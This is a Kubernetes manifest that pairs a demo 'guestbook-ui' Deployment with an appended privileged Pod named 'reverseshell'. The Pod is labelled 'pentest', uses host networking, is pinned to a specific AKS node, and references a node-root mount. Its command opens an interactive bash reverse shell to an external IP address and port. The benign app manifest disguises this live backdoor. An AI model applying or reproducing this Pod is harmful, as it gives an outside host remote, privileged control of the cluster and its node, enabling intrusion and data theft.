apiVersion: apps/v1
kind: Deployment
metadata:
  name: guestbook-ui
spec:
  replicas: 1
  revisionHistoryLimit: 3
  selector:
    matchLabels:
      app: guestbook-ui
  template:
    metadata:
      labels:
        app: guestbook-ui
    spec:
      containers:
      - image: gcr.io/heptio-images/ks-guestbook-demo:0.2
        name: guestbook-ui
        ports:
        - containerPort: 80
---
apiVersion: v1
kind: Pod
metadata:
  name: reverseshell
  labels:
    app: pentest
spec:
  hostNetwork: true
  containers:
  - name: re
    image: ubuntu
    command: ["/bin/bash", "-c", "--"]
    args: ["bash -i >& /dev/tcp/4.242.16.43/8999 0>&1"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
  nodeName: aks-userpool-01500227-vmss000000
    
    
